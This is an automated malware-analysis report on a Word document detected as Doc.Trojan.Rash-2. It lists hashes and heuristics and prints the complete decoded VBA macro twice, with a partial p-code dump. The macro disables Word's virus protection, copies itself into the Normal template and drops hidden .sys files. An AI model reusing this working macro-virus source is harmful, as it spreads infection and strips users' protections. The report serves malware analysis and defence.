Office (OLE) malware analysis — malicious · 703ee022d86d109d

MALICIOUS

Office (OLE)

44.0 KB Created: 1997-09-17 10:18:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: 593eed885e1315c4230f4ea303ff70cc SHA-1: 115568b806ef29ddf8fbc531845b37c36b40a1bd SHA-256: 703ee022d86d109def5c11e97edacc2c85fc306207ea0497dc26766e2dfc2744

120 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic

The sample contains a VBA macro that is triggered by the Document_Open event. This macro appears to be designed to obfuscate its own code and potentially write files to the filesystem. The macro attempts to create files with the pattern 'c:\AA??????.sys', which is suspicious. The ClamAV detection 'Doc.Trojan.Rash-2' further supports the malicious nature of the file.

Heuristics 3

ClamAV: Doc.Trojan.Rash-2 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Rash-2
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6072 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	6072 bytes
SHA-256: `5ec01f5a75e55047c2e1fadb6acf725c8f888ec747a0d92d242669e8d3f837ed`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_Close() Nabor = "RASHKILLER" Rem +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Rem + Âèðóñíàÿ ëàáîðàòîðèÿ Äàíèëà Èãîðåâà ã.Ïèò-Ñàíòåðáóðã 1999+ Rem +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ On Error Resume Next con = "Private Sub Document_Close()" col = MacroContainer.VBProject.VBComponents.Item(1).CodeModule.CountOfLines Dim mas(90) Options.ConfirmConversions = 0 Options.VirusProtection = 0 Options.SaveNormalPrompt = 0 no1 = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(1, 1) no2 = ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(1, 1) If no1 <> con Then Set tst = NormalTemplate.VBProject.VBComponents.Item(1) ElseIf no2 <> con Then Set tst = ActiveDocument.VBProject.VBComponents.Item(1) Else tst = "" End If If tst <> "" Then For i = 1 To col mas(i) = MacroContainer.VBProject.VBComponents.Item(1).CodeModule.Lines(i, 1) Next i For i = 1 To col tst.CodeModule.InsertLines i, mas(i) Next i End If For i = 1 To 20 nam = "c:\AA" For j = 1 To 6 kk = 10 * Rnd nam = nam + Mid(Nabor, Int(kk), 1) Next j nam = nam + ".sys" Open nam For Output As #1 Seek #1, 65535 * 2 Print #1, 'Ïðèÿòíîé ðàáîòû' Close #1 SetAttr nam, 6 Next i End Sub Private Sub Document_Open() Document_Close End Sub ' Processing file: /opt/analyzer/scan_staging/2066648a6e3e4fc1ac0a959a51c7fa0c.bin ' =============================================================================== ' Module streams: ' Macros/VBA/ThisDocument - 8214 bytes ' Line #0: ' FuncDefn (Private Sub Document_Close()) ' Line #1: ' LitStr 0x000A "RASHKILLER" ' St Nabor ' Line #2: ' Rem 0x0040 " +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++" ' Line #3: ' Rem 0x0040 " + Âèðóñíàÿ ëàáîðàòîðèÿ Äàíèëà Èãîðåâà ã.Ïèò-Ñàíòåðáóðã 1999+" ' Line #4: ' Rem 0x0040 " +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++" ' Line #5: ' OnError (Resume Next) ' Line #6: ' Line #7: ' LitStr 0x001C "Private Sub Document_Close()" ' St con ' Line #8: ' LitDI2 0x0001 ' Ld MacroContainer ' MemLd VBProject ' MemLd VBComponents ' ArgsMemLd Item 0x0001 ' MemLd CodeModule ' MemLd CountOfLines ' St col ' Line #9: ' Line #10: ' Dim ' OptionBase ' LitDI2 0x005A ' VarDefn mas ' Line #11: ' Line #12: ' LitDI2 0x0000 ' Ld Options ' MemSt ConfirmConversions ' Line #13: ' LitDI2 0x0000 ' Ld Options ' MemSt VirusProtection ' Line #14: ' LitDI2 0x0000 ' Ld Options ' MemSt SaveNormalPrompt ' Line #15: ' LitDI2 0x0001 ' LitDI2 0x0001 ' LitDI2 0x0001 ' Ld NormalTemplate ' MemLd VBProject ' MemLd VBComponents ' ArgsMemLd Item 0x0001 ' MemLd CodeModule ' ArgsMemLd Lines 0x0002 ' St no1 ' Line #16: ' LitDI2 0x0001 ' LitDI2 0x0001 ' LitDI2 0x0001 ' Ld ActiveDocument ' MemLd VBProject ' MemLd VBComponents ' ArgsMemLd Item 0x0001 ' MemLd CodeModule ' ArgsMemLd Lines 0x0002 ' St no2 ' Line #17: ' Line #18: ' Ld no1 ' Ld con ' Ne ' IfBlock ' Line #19: ' SetStmt ' LitDI2 0x0001 ' Ld NormalTemplate ' MemLd VBProject ' MemLd VBComponents ' ArgsMemLd Item 0x0001 ' Set tst ' Line #20: ' Ld no2 ' Ld con ' Ne ' ElseIfBlock ' Line #21: ' SetStmt ' LitDI2 0x0001 ' Ld ActiveDocument ' MemLd VBProject ' MemLd VBComponents ' ArgsMemLd Item 0x0001 ' Set tst ' Line #22: ' ElseBlock ' Line #23: ' LitStr 0x0000 "" ' St tst ' Line #24: ' EndIfBlock ' Line #25: ' Line #26: ' Ld tst ' LitStr 0x0000 "" ' Ne ' IfBlock ' Line #27: ' StartForVariable ' Ld i ' EndForVariable ' LitDI2 0x0001 ' Ld col ' For ' Line #28: ' Ld i ' LitDI2 0x0001 ' LitDI2 0x0001 ' Ld MacroContainer ' MemLd VBProject ' MemLd VBComponents ... (truncated)

SHA-256: 5ec01f5a75e55047c2e1fadb6acf725c8f888ec747a0d92d242669e8d3f837ed

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Close()
Nabor = "RASHKILLER"
Rem +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Rem + Âèðóñíàÿ ëàáîðàòîðèÿ Äàíèëà Èãîðåâà  ã.Ïèò-Ñàíòåðáóðã   1999+
Rem +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
On Error Resume Next

con = "Private Sub Document_Close()"
col = MacroContainer.VBProject.VBComponents.Item(1).CodeModule.CountOfLines

Dim mas(90)

Options.ConfirmConversions = 0
Options.VirusProtection = 0
Options.SaveNormalPrompt = 0
no1 = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(1, 1)
no2 = ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(1, 1)

If no1 <> con Then
Set tst = NormalTemplate.VBProject.VBComponents.Item(1)
ElseIf no2 <> con Then
Set tst = ActiveDocument.VBProject.VBComponents.Item(1)
Else
tst = ""
End If

If tst <> "" Then
  For i = 1 To col
   mas(i) = MacroContainer.VBProject.VBComponents.Item(1).CodeModule.Lines(i, 1)
  Next i
  
  For i = 1 To col
   tst.CodeModule.InsertLines i, mas(i)
  Next i
  
End If

For i = 1 To 20

 nam = "c:\AA"
 
 
  For j = 1 To 6
   kk = 10 * Rnd
   nam = nam + Mid(Nabor, Int(kk), 1)
  Next j
  
 nam = nam + ".sys"
 Open nam For Output As #1
 Seek #1, 65535 * 2
 Print #1,  'Ïðèÿòíîé ðàáîòû'
 Close #1
 
 SetAttr nam, 6
 
Next i

End Sub

Private Sub Document_Open()
 Document_Close
End Sub


' Processing file: /opt/analyzer/scan_staging/2066648a6e3e4fc1ac0a959a51c7fa0c.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 8214 bytes
' Line #0:
' 	FuncDefn (Private Sub Document_Close())
' Line #1:
' 	LitStr 0x000A "RASHKILLER"
' 	St Nabor 
' Line #2:
' 	Rem 0x0040 " +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++"
' Line #3:
' 	Rem 0x0040 " + Âèðóñíàÿ ëàáîðàòîðèÿ Äàíèëà Èãîðåâà  ã.Ïèò-Ñàíòåðáóðã   1999+"
' Line #4:
' 	Rem 0x0040 " +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++"
' Line #5:
' 	OnError (Resume Next) 
' Line #6:
' Line #7:
' 	LitStr 0x001C "Private Sub Document_Close()"
' 	St con 
' Line #8:
' 	LitDI2 0x0001 
' 	Ld MacroContainer 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	MemLd CodeModule 
' 	MemLd CountOfLines 
' 	St col 
' Line #9:
' Line #10:
' 	Dim 
' 	OptionBase 
' 	LitDI2 0x005A 
' 	VarDefn mas
' Line #11:
' Line #12:
' 	LitDI2 0x0000 
' 	Ld Options 
' 	MemSt ConfirmConversions 
' Line #13:
' 	LitDI2 0x0000 
' 	Ld Options 
' 	MemSt VirusProtection 
' Line #14:
' 	LitDI2 0x0000 
' 	Ld Options 
' 	MemSt SaveNormalPrompt 
' Line #15:
' 	LitDI2 0x0001 
' 	LitDI2 0x0001 
' 	LitDI2 0x0001 
' 	Ld NormalTemplate 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemLd Lines 0x0002 
' 	St no1 
' Line #16:
' 	LitDI2 0x0001 
' 	LitDI2 0x0001 
' 	LitDI2 0x0001 
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemLd Lines 0x0002 
' 	St no2 
' Line #17:
' Line #18:
' 	Ld no1 
' 	Ld con 
' 	Ne 
' 	IfBlock 
' Line #19:
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld NormalTemplate 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	Set tst 
' Line #20:
' 	Ld no2 
' 	Ld con 
' 	Ne 
' 	ElseIfBlock 
' Line #21:
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	Set tst 
' Line #22:
' 	ElseBlock 
' Line #23:
' 	LitStr 0x0000 ""
' 	St tst 
' Line #24:
' 	EndIfBlock 
' Line #25:
' Line #26:
' 	Ld tst 
' 	LitStr 0x0000 ""
' 	Ne 
' 	IfBlock 
' Line #27:
' 	StartForVariable 
' 	Ld i 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	Ld col 
' 	For 
' Line #28:
' 	Ld i 
' 	LitDI2 0x0001 
' 	LitDI2 0x0001 
' 	Ld MacroContainer 
' 	MemLd VBProject 
' 	MemLd VBComponents 

... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.